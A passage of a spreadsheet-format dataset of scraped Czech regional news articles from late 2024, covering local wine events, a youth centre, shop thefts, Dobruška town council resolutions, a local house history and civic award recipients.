chvíle, kdy se jako sousedé potkáváme a máme spolu možnost mluvit nejen přes plot nebo na ulici. Tyhle tradice bych nijak neměnil. Snad jen to počasí by občas mohlo být přívětivější. PODZIM SE ALE VYVEDL A LESY JSOU PLNÉ HUB, JEZDÍ K NÁM DESÍTKY HOUBAŘŮ, A TO I ZDALEKA. UŽ JSTE SI TAKÉ ZAHOUBAŘIL, NEBO TO NECHÁVÁTE „LUFŤÁKŮM“? Letošní úroda je opravdu nebývalá. Houbařím obvykle v pátek odpoledne, když jdu z úřadu. Obejdu si blízký les a zásobím se na víkendové vaření. Takže ano, pár hezkých kousků vždycky najdu, ale s množstvím to nepřeháním. Rubrika transition_slide ZPRÁVY Z RADNICE</t>
  </si>
  <si>
    <t>20241101_503_3364537756_9f01512363496d3d64aa.html</t>
  </si>
  <si>
    <t>9f01512363496d3d64aa</t>
  </si>
  <si>
    <t>Královský košt Hradec Králové</t>
  </si>
  <si>
    <t>Královský košt Hradec Králové fotografie Pultová degustace vín je organizována systémem all inclusiv, který umožňuje návštěvníkům ochutnat maximální množství vzorků. Součástí degustace je i prezentace kvalitních sýrů, uzenin či paštik. Všechna prezentovaná vína získala medaile v jedné z největších soutěží v ČR. Bez nadsázky lze říci, že na Královském koštu ochutnáte aktuálně nejlepší vína České republiky . Reklama Vstupné již od 549 Kč: Vstupenka pro 1 osobu 899 Kč Vstupenka pro 2 osoby 1 499 Kč (lze koupit pouze v předprodeji) Skupinová pro 6 osob 3 899 Kč (lze koupit pouze v předprodeji) Skupinová pro 10 osob 5 499 Kč (lze koupit pouze v předprodeji) !!!Předprodej zvýhodněných vstupenek končí nejpozději 3 týdny před akcí, nebo při vyčerpání kvóty!!! V ceně vstupného: – neomezená degustace – e-kniha KRÁL VÍN České republiky 2024 – e-katalog – voda – losování tomboly o věcné ceny – skleničku vám zapůjčíme za zálohu 100 Kč Degustační on-line katalog s možností nákupu vín a hlasováním o ceny Stáhněte si do mobilu aplikaci s katalogem vín. Díky ní se můžete zapojit do slosování o hodnotné ceny. Apka vám urychlí orientaci v nabízených vínech a ještě před příchodem na akci si v ní lze označit vína , která chcete ochutnat. Během degustace vám umožní si k vínům psát vlastní poznámky a hodnocení… Reklama Super nabídka pro firmy Při umístění umístění reklamy Vaší společnosti na akci (ideální forma roll-up) za základní cenu 6 000 Kč bez DPH získáte jako BONUS 10 vstupenek pro vaše obchodní partnery či zaměstnance. Pište na branko@kralvin.cz Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_504_3400865471_404fad0a008af181b664.html</t>
  </si>
  <si>
    <t>404fad0a008af181b664</t>
  </si>
  <si>
    <t>Žehnání mladému vínu ročníku 2024</t>
  </si>
  <si>
    <t>Žehnání mladému vínu ročníku 2024 0 z 5 Odkaz byl zkopírován Foto: vinazmoravyvinazcech.cz Kněžského požehnání se ujme místní farář František Putna, jež společně s velkopavlovickými vinaři, představiteli města a samozřejmě i s vámi, poprvé oficiálně ochutná letošní víno . Reklama K příjemné náladě zahraje cimbálová muzika VINICA. Neváhejte proto, vezměte s sebou vzorek mladého vína a přijděte se pochlubit a podělit se o své zkušenosti s ostatními vinaři. K této příležitosti nemusejí být vína vyčeřená ani jiskrná. Vstupné 100 Kč Na tuto vinařskou akci zveme všechny přátele dobrého vína a dobré nálady! Buďte vítáni… Na zdraví! Reklama Upřesnění místa: Vinné sklepy Františka Lotrinského , Nádražní 1 (vstup od restaurace Sport, areál TJ Slavoj) Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_505_3241582258_e7e6839a790b96294598.html</t>
  </si>
  <si>
    <t>e7e6839a790b96294598</t>
  </si>
  <si>
    <t>Nízkoprahové zařízení pomáhá dětem</t>
  </si>
  <si>
    <t>Nízkoprahové zařízení pomáhá dětem Mladí lidé mohou v nízkoprahovém zařízení najít i sebedůvěru pro další život. Nízkoprahové zařízení pro děti ESKO ve Žďáře nad Sázavou otevřelo své brány ve středu 9. října. Nás se ujímá sociální pracovnice Natálie Zpěváková, a z jejich úst se dozvídáme, o jakou službu se jedná. Posláním nízkoprahového zařízení pro děti a mládež ESKO je poskytovat zázemí dětem a mladým lidem ze Žďáru nad Sázavou , kteří se ocitli v nepříznivé životní situaci nebo jsou jí ohroženi a tím přispívat ke zlepšení kvality jejich života. Cílem je podpora uživatele služby v době dětství a dospívání tak, aby se začlenil do vrstevnické skupiny a dokázal v ní fungovat, znal možnosti jak trávit bezpečně svůj volný čas, zvládl konflikty ve vztazích, připravoval se studiem na povolání, uměl si najít a udržet práci, měl informace o činnostech, které mohou ohrozit jeho zdraví a orientovat se ve službách dostupných v regionu a v případě potřeby je uměl využít. Docházejí tam děti a mladí lidé ve věku 6 až 20 let z lokality Žďár nad Sázavou , kteří se ocitli v nepříznivé životní situaci nebo jsou jí ohroženi, k dispozici je i terénní forma služby. Službu nelze poskytnout dětem a mladým lidem, kteří nemluví a nerozumí česky, nejsou se schopni domluvit s pracovníky na průběhu poskytování služby, a kteří jsou pod vlivem alkoholu či omamných látek a svým chováním ohrožují ostatní uživatele a pracovníky služby. Sociální služba zachovává lidskou důstojnost, rovnost – nárok na využívání služby mají všichni bez rozdílu pohlaví, národnosti, náboženského vyznání, sexuální orientace, individuální přístup ke klientům či diskrétnost. „Součástí je počítačová místnost, výtvarná místnost i krizové místo, kde si mohou klienti s námi popovídat při zaručené anonymitě Většinou se jedná o jednoho pracovníka a jednoho klienta,“ vysvětluje Zpěváková. Doplňuje, že zařízení má k dispozici i zahradu. V době naší návštěvy se v zařízení potkáváme s místostarostou Rostislavem Dvořákem, který má sociální služby ve městě pod patronací. „Samozřejmě jejich službu podporujeme. Víme, že dnešní společnost tuto službu potřebuje. Patří pod Sociální služby města, jsou tedy naše. A kdykoliv se na nás mohou obrátit,“ říká Dvořák. Vedoucí nízkoprahového zařízení pro děti a mládež Markéta Nováková Irovská uvedla, že registrují zhruba stovku klientů, zařízení má tři pracovnice. V jednu chvíli může být v zařízení patnáct dětí. „Provozujeme dva kluby, pro mladší děti každý den od 12 do 15 hodin, v pátek je služba o půl hodiny kratší. U starších máme otevřeno pondělí, úterý čtvrtek od 15.30 do 18 hodin, v pátek do 17 hodin,“ vypočítává vedoucí. Zařízení funguje i o prázdninách pro mladší klienty od pondělí do pátku od 9 do 12 hodin pro starší v pondělí, úterý a čtvrtek od 13 do 16 hodin. Doplňuje, že klienti mají k dispozici i tělocvičnu či hudební klubovnu. Zařízení poskytuje i doučování, s tím pomáhají zejména středoškoláci, i s akcemi, kde je potřeba víc pořadatelů. NATÁLIE ZPĚVÁKOVÁ ukazuje na stůl, který využívají klienti zařízení ESKO. Foto: Antonín Zvěřina Autor: Antonín Zvěřina Autor Antonín Zvěřina</t>
  </si>
  <si>
    <t>15300</t>
  </si>
  <si>
    <t>20241101_506_3241582271_32434d793f15f0a89345.html</t>
  </si>
  <si>
    <t>32434d793f15f0a89345</t>
  </si>
  <si>
    <t>Kradli tři lidé</t>
  </si>
  <si>
    <t>Kradli tři lidé V 18 hodin 25. září v obchodním středisku zadrželi zloděje, který ukradl jídlo v kontě asi 350 korun. Hlídka mu udělila pokutu tři tisíce korun. Po více než hodině zadrželi ve stejném marketu dalšího pobertu, který si přivlastnil bez placení krabici vína , a pokuta tři tisíce korun ho také neminula. V době řešení tohoto případu se opět v marketu kradlo. Nenechavci se zalíbila láhev tvrdého alkoholu a i ten dostal pokutu tři tisíce korun. „To se nám ještě nestalo, aby během chvíle v jednom obchodě kradli tři lidé,“ přiznal vedoucí Kunc. -zt-</t>
  </si>
  <si>
    <t>20241101_507_3241316563_165201a2dbb1282983f7.html</t>
  </si>
  <si>
    <t>165201a2dbb1282983f7</t>
  </si>
  <si>
    <t>ZPRÁVY Z RADNICE</t>
  </si>
  <si>
    <t>ZPRÁVY Z RADNICE Z jednání rady města Úplná znění usnesení rady města jsou zveřejněna na internetových stránkách města. Rada města dne 23.09.2024 schválila – provedení rozpočtového opatření číslo 18/2024 – vymáhat úhradu vzniklé škody ve výši 16.354,11 Kč, kterou není možné uplatnit v rámci pojištění odpovědnosti. Jelikož není znám konkrétní viník, je odpovědnou osobou vedoucí pečovatelské služby – prodloužení termínu pro odstranění vady specifikované v důvodové zprávě, která spočívá v zatékání střechou objektu sportovní haly v Dobrušce , dle žádosti zhotovitele do 30.09.2024 – zahájení výběrového řízení na dodavatele pro veřejnou zakázku malého rozsahu na služby Zpracování lesních hospodářských osnov Dobruška formou odeslání výzvy o zahájení výběrového řízení těmto obchodním subjektům: Lesprojekt východní Čechy, s. r. o. , Lesprojekt Hradec Králové , s. r. o., ING-FOREST, s. r. o., TAXLES, s.r.o., s Lesprojekt jižní Čechy, s . r. o. a výzvu k podání nabídky a zadávací dokumentaci – objednání prováděcí projektové dokumentace pro stavbu Stavební úpravy střechy ZŠ Pulická u společnosti DEKPROJEKT s. r. o. za 413.820 Kč vč. 21 % DPH – vyvěšení záměru prodeje pozemku parc. č. 678/1, jehož součástí je stavba čp. 173 v ulici Pulické a pozemku parc. č. 678/2, jehož součástí je garáž bez č. p./č. e., vše v obci a k. ú. Dobruška se všemi součástmi a příslušenstvím a podmínky výběrového řízení – uzavření smlouvy o nájmu prostor sloužících podnikání na nebytové prostory v II. NP budovy čp. 11 na náměstí F. L. Věka se společností ARRIVA TRANSPORT ČESKÁ REPUBLIKA a. s. – uzavření dodatků ke smlouvám o nájmu bytu k bytu č. 1 v domě čp. 1 v Pulicích , v ulicích Na Příčnici a Fr. Kupky – podání výpovědi nájmu nebytových prostor (garáž, kůlna) v přístavbě rodinného domu čp. 1 v Pulicích – uzavření smlouvy o nájmu bytu k bytu č. 2 v čp. 1011 v ulici Na Příčnici , k bytu č. 10 v čp. 671 v ulici Na Příčnici a k bytu č. 10 v čp. 1060 v ulici Fr. Kupky – zveřejnění záměru pronájmu částí místní komunikace Šubertovo náměstí na pozemku parc. č. 2707 v obci a k. ú. Dobruška – uzavření smlouvy o výpůjčce nemovitých věcí se Společenstvím vlastníků bytů, Orlická 974 a 975, Dobruška, částí městských pozemků parc. č. 270/93, parc. č. 270/94, parc. č. 270/95, parc. č. 270/111, parc. č. 270/112, parc. č. 270/113, parc. č. 270/141 a parc. č. 270/143, vše v obci a k. ú. Dobruška , za účelem dočasného umístění lešení a zázemí staveniště – poskytnutí účelové neinvestiční dotace ve výši 4.000 Kč pro spolek Ženský pěvecký sbor Vlasta, z. s. na účast pěveckého sboru na 23. mezinárodním festivalu I. Reimanna v Krosnowicích dne 28.09.2024 – poskytnutí účelové neinvestiční dotace ve výši 9.000 Kč pro spolek SK Dobruška, z.s., na Dětský den s fotbalem – poskytnutí finančního daru hotovosti ve výši 2.000 Kč, pamětní medaile nordic gold „700 let města“ a USB flash disk pro každé dítě dle přiloženého seznamu (celkem 9 dětí), které se zúčastní vítání občánků dne 11.10.2024 – úhradu ubytování a stravování zahraničním delegacím z maďarského města Ábrahámhegy, polských měst Miejska Górka a Pilawa Górna, slovenských měst Hnúšťa a Veľký Meder a holandského města Nieuwkoop, které se zúčastní Svatováclavských slavností 2024, a bezplatné zapůjčení prodejního stánku hostům z maďarského města Ábrahámhegy a holandského města Nieuwkoop za účelem propagace a ochutnávky tradičních domácích specialit na Svatováclavských slavnostech 2024 – pracovní cestu místostarosty Jana Špačka do maďarského partnerského města Ábrahámhegy , která se uskuteční 04.10. – 06.10.2024. Dále rada schvaluje nákup sudového dobrušského piva jako prezentaci české gastronomie při slavnosti obce Ábrahámhegy – prominutí platby za stánek Střední průmyslové škole, Odborné škole a Základní škole, Nové Město nad Metují při prodeji na Svatováclavských slavnostech dne 28.09.2024 – poskytnutí věcného daru v maximální výši 30.000 Kč obci Česká Ves postižené ničivou povodní v září 2024 – podání výpovědí nájmů prostor v budově čp. 99 v Pulické ulici v Dobrušce sjednaného smlouvou o nájmu prostor sloužících podnikání s Radkou Danielovou a Lucii Štěpánovou – uzavření dodatku č. 1 ke smlouvě o poskytnutí dotace z rozpočtu Královéhradeckého kraje souhlasila – s přijetím peněžních darů Základní škole Františka Kupky od Spolku rodičů a přátel školy při Základní škole Františka Kupky v Dobrušce ve školním roce 2024/2025 v maximální výši 90.000 Kč a s přijetím peněžních darů Základní umělecké škole od Spolku rodičů a přátel Základní umělecké školy v Dobrušce ve školním roce 2024/2025 v maximální výši 20.000 Kč – se změnou termínu a výpůjčkou pozemků na náměstí F. L. Věka SDH Dobruška dne 05.10.2024 za účelem konání oslav 150. výročí založení SDH Dobruška v době od 9:00 do 18:00 byla seznámena – s výpovědí nájmu prostor sloužících podnikání nájemcem - společností Akademie nevšedního vzdělávání, s.r.o., podanou nájemcem dne 30.08.2024, nesouhlasila s nájemcem ve výpovědi uplatněným výpovědním důvodem pro jeho neoprávněnost a uložila odboru rozvoje města písemně vyrozumět nájemce o neoprávněnosti ve výpovědi uvedeného výpovědního důvodu a o jeho neakceptování městem Dobruškou a o skončení nájmu na základě nájemcem podané výpovědi až k 30.11.2024 – se zápisem č. 7 z jednání Bytové a sociální komise Rady města Dobrušky konaného dne 14.08.2024 včetně tabulky Bodové hodnocení žádostí o zařazení do seznamu žadatelů o pronájem městského bytu a v něm uvedenými návrhy na obsazení bytu č. 2 v čp. 1011 a bytu č. 10 v čp. 671 v ulici Na Příčnici v Dobrušce a bytu č. 10 v čp. 1060 v ulici Fr. Kupky – se zápisem č. 7/2024 ze dne 20.08.2024 z jednání Kulturní komise Rady města Dobrušky Rada města dne 07.10.2024 souhlasila – s přijetím peněžních darů Základní škole, Dobruška , Pulická od Klubu přátel školy Pulická, Dobruška , z. s. ve školním roce 2024/2025, v maximální výši 50.000 Kč schválila – vymáhat úhradu spoluúčasti, amortizace a neuznaných nákladů pojišťovnou při řešené škodní události č. 9033591 ve výši 7.040 Kč od odpovědného zaměstnance Technických služeb města Dobrušky – uzavření dodatku č. 1 k objednávce č. 4, jejímž předmětem je vypracování studií revitalizace školních zahrad při budovách mateřské školy v ulici Za Univerzitou a Komenského, se společností CleverFox, s. r. o. – prominutí smluvní pokuty za nedodržení termínu pro odstranění vady v celkové výši – 5.000 Kč společnosti PS BRNO, s. r. o. – prodloužení termínu pro odstranění vady specifikované v důvodové zprávě, která spočívá v zatékání střechou objektu sportovní haly v Dobrušce do 15.10.2024 – dodatek k objednávce č. 148, učiněné u Petra Tomáše, IČO 11048476, na provedení opravy památníku obětem nacismu v Dobrušce, na jehož základě bude u zhotovitele objednáno provedení víceprací spočívajících v provedení důkladného vyčištění prasklin od výdrolků, celkové hydrofobizace speciálním roztokem a zatmelení prasklin, vše v hodnotě 15.000 Kč, čímž celková hodnota objednávky bude činit 155.000 Kč – uzavření dodatku č. 3 ke smlouvě o výpůjčce sbírkových předmětů č. 74/2021 s Ministerstvem obrany, jehož předmětem je zapůjčení sbírkového předmětu Univerzitě obrany – podmínky účasti a přihlášku na vánoční jarmark konaný dne 01.12.2024 zrušila – usnesení č. RM 23/64/2024, jímž bylo schváleno poskytnutí dotace ve výši 4.000 Kč pro spolek Ženský pěvecký sbor Vlasta, z. s. na účast pěveckého sboru na 23. mezinárodním festivalu I. Reimanna v Krosnowicích dne 28.09.2024. Žadatel z důvodu zrušení akce již nemá o poskytnutí dotace zájem byla seznámena – s plánovaným uzavřením smlouvy na následující kulturní akci: Divadelní představení Žáby (04.12.2024, Společenské centrum – Kino 70) – se zápisem č. 8/2024 ze dne 18.09.2024 z jednání Kulturní komise Rady města Dobrušky – se zápisem ze dne 23.09.2024 z jednání Dopravní komise Rady města Dobrušky</t>
  </si>
  <si>
    <t>3300</t>
  </si>
  <si>
    <t>20241101_508_3241335051_867608ee079e446dbcb4.html</t>
  </si>
  <si>
    <t>867608ee079e446dbcb4</t>
  </si>
  <si>
    <t>Příběhy dobrušských domů – XI. část</t>
  </si>
  <si>
    <t>Příběhy dobrušských domů – XI. část Rubrika: Z HISTORIE Seriál Dobrušského zpravodaje autorů Jiřího Macha a Josefa Frýdy o osudech domů a lidí, kteří v nich žili, pokračuje jedenáctým dílem. V něm se čtenáři dozvědí zajímavosti z historie domu čp. 8 v řadové zástavbě v Kostelní ulici. Kostelní ulice čp. 8 Mohl by se také nazývat domem rebelů. Vyšly z něj dvě osobnosti, které výrazným způsobem poznamenaly naše dějiny, a to nejen dějiny města Dobrušky, ale v jistém směru i historii celého českého národa. Samotný dům je celkem nenápadný. Stojí v řadové zástavbě Kostelní ulice poblíž náměstí nesoucího dnes jméno nejpopulárnějšího dobrušského rodáka a hrdiny Jiráskovy monumentální pentalogie F. L Věka. Dům čp. 8 je součástí historického jádra města a stával na tomto místě už dobách založení Dobrušky někdy ve 13. století. Vypadal samozřejmě jinak než dnes. Původní stavba byla nepochybně dřevěná a stejně jako ostatní domy v jejím okolí padla za oběť požáru v roce 1565. Kdo ví, možná, že město postihl ohnivý kohout i v dřívějších dobách, ale písemné doklady o tom nejsou. Požár v polovině 16. století však výrazně poznamenal tvář města. Na spáleništi vyrostly nové domy a dá se předpokládat, že alespoň u některých bylo přízemí již vystavěné z kamene. Klenutá podloubí, která obklopovala celé náměstí, se táhla i přilehlou Kostelní ulicí, takže měšťané, jdoucí na služby Boží, mohli téměř celou cestu projít suchou nohou. O starobylosti domu svědčí zejména jeho podzemní část. Kameny sklepa jsou kladeny na sucho, kamenná je podlaha a valená klenba. Sklep měl i vlastní studnu jako zdroj vody. Ostatně, studna nebo alespoň studánka (či jejich stopy) se nacházejí v každém z domů historické středověké zástavby. Prameny byly zřejmě v dřívějších dobách na území města četnější a hladina spodní vody sahala podstatně výše, než je tomu dnes. Sklepy, které jsou právě u některých domů v Kostelní ulici dokonce ve dvou úrovních, měly ještě další důležitou funkci. Staly se součástí fortifikace města a měly chránit Dobrušku proti případnému napadení od severní strany. K tomu jim byl zřejmě nápomocný i potok Brtva, dříve mnohem hojnější na vodu, který právě z této strany tvořil přirozenou překážku případným útočníkům. Další obrannou stavbou byla městská zeď. V dějinách města není však zaznamenán žádný případ, že by bylo obléháno či dobýváno, takže obranné stavby a jiné obranné prvky nebyly nikdy zapotřebí. Proti opravdovému vojsku by zřejmě stejně nebyly mnoho platné. Sklepy v této frontě domů byly však (zřejmě právě z důvodů případné obrany) vzájemně propojeny. Náznak takovéhoto spojení najdeme na více místech, mj. i v domě čp. 8. Později však byly všechny tyto průchody zazděny. Mikuláš Doubrava První ze dvou zmíněných osobností byl radní Mikuláš Doubrava. Jeho rod držel dům od nejstaršího známého záznamu roku 1588 až do roku 1820. Nešlo vždy jen o jméno Doubrava, vlastnictví ale přecházelo vždy v rodině. Mikuláš Doubrava je jedním z hrdinů dalšího Jiráskova románu Temno, líčícího v monumentální fresce jedno z nejsložitějších období našich dějin, dobu nejtužší protireformace v prvních desetiletích 18. století. Na rozdíl od F. L. Věka, jehož skutečné jméno znělo Hek, jméno Mikuláše Doubravy nechává Jirásek nezměněné, stejně jako hlavní obrysy jeho osudů. Doubrava patřil k mnoha tajným evangelíkům, kteří přežívali perzekuční opatření protireformace. O mnoha jeho souvěrcích historie nepodává žádných informací, protože se jim podařilo uniknout všem slídivým očím především jezuitských misionářů. Doubrava to štěstí neměl. Třicátá léta 18. století byla v našem kraji dobou velmi neklidnou. V roce 1732 vypukla otevřená rebelie pro víru v řadě obcí opočenského panství. Mezi kostely, které rebelové požadovali vydat pro konání evangelických bohoslužeb, náležel i kostel Svatého Ducha. Zřejmě měl být určen právě pro tajné nekatolíky z Dobrušky a nejbližšího okolí, k nimž náležel i Doubrava. Rebelie byla potlačena a následovalo hledání evangelíků po celém panství. Při domovní prohlídce u radního a pekaře Mikuláše Doubravy byly nalezeny a zabaveny zakázané evangelické knihy a samotný Doubrava neušel trestu. František Adolf Šubert Doubrava však nebyl jediným významným obyvatelem domu čp. 8. 27. března 1849 zde spatřil světlo světa František Adolf Šubert, který se v závěru 19. a na počátku 20. století stal jednou z nejvýraznějších osobností české kultury a českého národního života. Psát o Šubertovi by bylo opravdu nošením dříví do lesa. Snad jen pro připomenutí: byl prvním ředitelem Národního divadla , významným novinářem, iniciátorem a jednou z hybných sil mnoha kulturních akcí, iniciátorem národopisné výstavy v roce 1895 a jedním ze zakladatelů českého národopisného bádání, editorem a spoluautorem reprezentativní encyklopedie Čechy atd. atd. K Dobrušce měl Šubert vždy velmi vřelý vztah, pomáhal i zdejším divadelním ochotníkům; kromě jiného jim malířem Národního divadla nechal zhotovit kulisy a jednoho z nejlepších, Ignáce Hoňka, chtěl dokonce angažovat v souboru naší první scény. Rodný dům připomíná Šubert i v útlé knížce svých vzpomínek na dětství U nás v Dobrušce , která vyšla v roce 1916, aniž by se autor dožil jejího vydání. Po úrazu, který utrpěl, musel jeho otec hledat nové zaměstnání. „Takovým zdála se býti živnost hostinská. I najali si malou hospodu na podsíni v ulici Kostelní č. 8. Nebylo k ní leč jedné velké a jedné malé světničky do dvora, jak u starých domů dobrušských jsou zřízeny, a neveliká předsíň domovní, ve které o trzích také se postavil nějaký ten stůl. Ale ani v té živnosti valně se jim nevedlo. Při veškeré, druhdy nemilé práci byl výdělek nepatrný a živobytí svou povahou neveselé.“ Šubert se rád do Dobrušky vracel a měl zde i celou řadu přátel. Jednu z jeho návštěv, která se odehrála při příležitosti oslav založení dobrušského ochotnického spolku v roce 1887, uvádí ve svých vzpomínkách dobrušský hodinář Alois Kohoutek: „Když jsme přišli do náměstí, byly asi 4 hodiny, před „Labutí“ stály kočáry a do nich nasedala honorace a jeli Šubertovi do nádraží naproti a asi po páté vezli ho ovšem napřed s praporem a hudbou do náměstí; ten večír byla generální zkouška a druhý den první hra Jana Výravy, dostal jsem se tam po oba večery a viděl, jak řed. Šubert hru řídil. V předvečer odjezdu zapěly pěvecké sbory před hotelem Jelen , kde byl ubytován, Smetanovo Věno a rozloučily se se vzácným hostem. Pak přijel ještě dvakrát do svého rodiště, a sice r. 1899, a šel rovnou do radnice navštívit svého kamaráda Josefa Archleba , t.č. starostu města, a zastavil se pro mého otce a šli spolu do hotelu U jelena, kde při skleničce vína vzpomínali starých zašlých dob; a večer odjel zase do Prahy .“ Město Dobruška převzalo péči o místo posledního Šubertova odpočinku na Olšanských hřbitovech v Praze . Tím vzdalo poctu svému slavnému rodákovi. Dům v roce 1948. Současný pohled na dům čp. 8 v Kostelní ulici. Autor: (jm) Autor person jm Rubrika transition_slide Z HISTORIE</t>
  </si>
  <si>
    <t>20241101_509_3241325056_9839e473199cb8ec9ab7.html</t>
  </si>
  <si>
    <t>9839e473199cb8ec9ab7</t>
  </si>
  <si>
    <t>PŘEHLED OCENĚNÝCH OSOBNOSTÍ</t>
  </si>
  <si>
    <t>PŘEHLED OCENĚNÝCH OSOBNOSTÍ Stříbrná medaile Zásluhy o rozvoj Dobrušky v oblasti podnikání a kultury Ing. Ladislav Horčička Ladislav Horčička spolu s manželkou založili dobrušskou firmu Servisbal , která už přes 30 let vytváří pracovní místa pro mnoho obyvatel Dobrušky i jejího okolí a přispívá k dobrému jménu Dobrušky i podorlického regionu. Ze své pozice se vždy snažil o podporu místních aktivit a otevřený dialog s městem. Ladislav Horčička, ač dnes už nebydlí v přímo v Dobrušce, se dlouhodobě podílí na kulturním dění města z pozice ředitele spolku F. L. Věka a rozvíjí aktivity, které mají za cíl další rozkvět Dobrušky . Stříbrná medaile Zásluhy o rozvoj Dobrušky v oblasti podnikání a kultury Milan Vedra Milan Vedra spojil s výrobou piva a pivovarnictvím celý svůj život. Pivovar v Dobrušce získal v roce 2007. Postupně zrekonstruoval a vybavil všechny objekty areálu v Křovické ulici a v roce 2012 se stal dobrušský pivovar ryze rodinným podnikem. Se zvyšující se výrobou a sortimentem piv rostl také počet zaměstnanců. Všechna dobrušská piva , vyráběná z vlastního sladu, získala řadu ocenění v odborných degustacích. Citlivá obnova sladovny a pivovaru přinesla v roce 2015 uznání ve formě zápisu souboru věcí a objektů pivovaru do Ústředního seznamu kulturních památek České republiky. Vedle podnikatelských úspěchů při výrobě piva se stal Rodinný pivovar Rampušák pojmem díky hudebnímu festivalu, na který přijíždějí příznivci z celého kraje i míst mnohem vzdálenějších. Pivovar Rampušák je partnerem mnoha kulturních a sportovních projektů. Podporuje například varhanní soutěž v Opočně , druhým rokem také Festival F. L. Věka či Open Air Cup ve florbale. Bronzová medaile Zásluhy o rozvoj Dobrušky v oblasti průmyslu Ing. Zdeněk Forejtek Od roku 1992 zastával ve firmě Adast Dobruška pozici finančního ředitele. Díky jeho odborné erudovanosti a především osobnímu vztahu k výrobě polygrafických strojů se největší dobrušská firma úspěšně vypořádala s privatizačním procesem, dále se rozvíjela a nakonec se zdárně začlenila v roce 2005 do koncernu Koenig &amp;amp; Bauer. V té době se navíc stal pan Forejtek prokuristou firmy. Zdeněk Forejtek pracoval ve firmě Grafitec přes 42 let a v porevoluční historii firmy byl naprosto klíčovou postavou, bez které by výroba tiskových strojů už mnoho let v Dobrušce neexistovala. Bronzová medaile Zásluhy o rozvoj Dobrušky v oblasti zdravotnictví MUDr. Josef Bejda Narodil se 27. srpna 1945 v Žatci . Do Dobrušky se přestěhoval v roce 1974 a od 1. listopadu stejného roku začal ordinovat jako praktický lékař. Letos to je padesát let, co pečuje o zdraví dobrušských občanů, a to i nad rámec svých povinností praktického lékaře. Pokud má zdravotní problém některý z jeho pacientů, který je v seniorském věku nebo se zdravotním postižením, neváhá přijet za ním i mimo jeho ordinační hodiny. Svoji pomoc neodmítne ani ostatním. Dlouhá léta také přednášel zdravovědu na různých seminářích a besedách pro širokou veřejnost a to nejen v Dobrušce . V příštím roce dovrší osmdesát let a stále naplno pečuje o zdraví místních občanů. Bronzová medaile Za zásluhy o rozvoj Dobrušky v oblasti kultury MgA. Jan Holek V roce 1996 ukončil studium na JAMU obor činoherní herectví a ihned nastoupil do stálého angažmá Městských divadel pražských divadla Rokoko. Jako host působil v Městském divadle Zlín , Divadle v Řeznické, Redutě, ACT a v divadle Pavla Trávníčka . V roce 2018 se stal pedagogem literárně-dramatického a hudebního oboru (hra na keyboard) Základní umělecké školy Dobruška . Jeho žáci se prezentují na veřejnosti především kvalitním uváděním koncertů a vlastními divadelními vystoupeními. První byla pohádka Byl jednou jeden drak, po ní následovaly Rychlé šípy, Revizor, Monty Python Kabaret, O ševci Ondrovi a komtese Julince a také Kytice, s níž se představili nejen příznivcům divadla v regionu, ale také na soutěžích. Všechna představení mají vysokou úroveň a jsou skvěle hodnocena. Jan Holek vede talentované žáky k lásce k divadlu takzvaně na celý život a dobrušským ochotníkům díky jeho práci rostou noví nástupci. Medaile Aloise Beera Karel Procházka (* 11. 4. 1908 v Dobrušce , † 27. 4. 1974 v Opočně ) Dobrušský rodák byl profesorem dějepisu, zeměpisu a občanské nauky. Učil mimo jiné na dobrušském gymnáziu, nebo v obecné škole v Podbřezí. Psal do regionálního tisku své historické studie, režíroval ochotnické divadlo a působil ve skautu. Po květnu 1945 byl zvolen poslancem Národního shromáždění a předsedou krajského výboru Čs. strany lidové. Svým demokratickým zásadám se nikdy nezpronevěřil, ještě na veřejném shromáždění v dobrušských Archlebových sadech po únorovém komunistickém puči 1948 statečně varoval před nástupem totalitního režimu. Proto byl také zbaven učitelského místa a mohl pracovat jen jako dlaždič. Na základě provokace byl v roce 1949 odsouzen ke třiceti letům těžkého žaláře. Prošel věznicemi Plzeň – Bory, Leopoldovem a Valdicemi , odkud byl v roce 1960 propuštěn na amnestii. Z doby věznění pochází jeho básnická sbírka Kruh a kříž. Po návratu z vězení pracoval v Okresním stavebním podniku v Dobrušce a aktivně se podílel na kulturním životě města jako režisér ochotnických divadelních představení. Patřil k vynikajícím osobnostem dobrušské divadelní historie, zvláště výrazným způsobem se do ní zapsal svou režií dramatu bratří Čapků Ze života hmyzu a dalších inscenací v uvolněnější atmosféře šedesátých let. Karel Procházka byl plně soudně rehabilitován, ale návrat k učitelské profesi mu nebyl umožněn. V posledních letech svého života pracoval v garážích dobrušského ČSAD . Pracovní úraz, který zde utrpěl, uspíšil jeho odchod ze života v roce 1974. Medaili převzal Jiří Roszynec, vnuk Karla Procházky . Medaile Aloise Beera Ing. Jan Šebelík a Zdeňka Šebelíková Medaile Aloise Beera byla udělena manželům Janu a Zdeňce Šebelíkovým z Frýdku-Místku za kulturní přínos našemu městu. Jan Šebelík (na snímku) spolu se svou sestrou Jarmilou jsou potomky Františka Vladislava Heka . Vzhledem k tomu, že nemají dědice, věnovali do sbírek dobrušského vlastivědného muzea cenné předměty z pozůstalosti jejich významného předka: jednu ze dvou mincí, kterou Hekovi daroval Wolfgang Amadeus Mozart, knihovní skříň, která zdobila domácnost Hekovy dcery Ludmily v Letohradě , sklo s rodinnými monogramy či dobové archiválie, například Krameriovy noviny z roku 1790, kde byl také sloupek o „milém, přičinlivém a jinak horlivém vlastenci Františku Hekovi “. Od návštěvy Dobrušky v roce 2022 manželé Šebelíkovi nezištně finančně podporují veškeré opravy rodného domu Františka Vladislava Heka . S jejich pomocí byla v roce 2022 a 2023 vyměněna všechna okna, následně také dřevěná vjezdová vrata, předlážděn vstupní prostor před vjezdem a v letošním roce konečně také nahrazeno velmi nebezpečně se drolící dláždění dvorové části rodného domu a nahrazeno mlatovým povrchem s částí pískovcové dlažby. Autor: (dr) Autor person dr</t>
  </si>
  <si>
    <t>20241101_51_3276919283_f4505c5f42a5c73710ad.html</t>
  </si>
  <si>
    <t>f4505c5f42a5c73710ad</t>
  </si>
  <si>
    <t>Mladistvého motorkáře přehlédl</t>
  </si>
  <si>
